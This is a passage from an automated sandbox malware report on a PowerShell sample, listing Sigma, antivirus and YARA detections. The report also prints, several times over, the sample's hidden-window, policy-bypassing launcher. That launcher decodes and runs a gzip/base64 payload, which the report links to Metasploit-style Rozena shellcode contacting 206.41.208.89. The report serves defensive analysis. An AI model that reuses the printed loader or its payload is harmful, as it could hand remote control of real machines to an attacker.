System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzK
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", ProcessId: 7532, ProcessName: powershell.exe
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7532, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline", ProcessId: 7724, ProcessName: csc.exe
Sigma detected: Gzip Archive Decode Via PowerShell
Source: Process startedAuthor: Hieu Tran: Data: Command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", CommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzK
Sigma detected: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))", CommandLine: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzK
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7532, TargetFilename: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", ProcessId: 7532, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7532, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline", ProcessId: 7724, ProcessName: csc.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dllAvira: detection malicious, Label: TR/Rozena.Gen
Multi AV Scanner detection for submitted file
Source: x6bjOrKFQn.ps1ReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dllJoe Sandbox ML: detected
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbR] source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbt\ source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbc~ source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbA source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdb source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbl source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdbhP source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewIP Address: 206.41.208.89 206.41.208.89
Source: unknownTCP traffic detected without corresponding DNS query: 206.41.208.89
Source: unknownTCP traffic detected without corresponding DNS query: 206.41.208.89
Source: unknownTCP traffic detected without corresponding DNS query: 206.41.208.89
Source: powershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DF92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE6641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767905639.000001E25DDB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1767905639.000001E25DFD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1832364726.000001FDF68C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1748447398.000001FDE87BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1883737331.000001E26DE25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1748447398.000001FDE8672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: Process Memory Space: powershell.exe PID: 7532, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001FDE66200CA0_2_000001FDE66200CA
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bce30.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.powershell.exe.1fde84bc000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
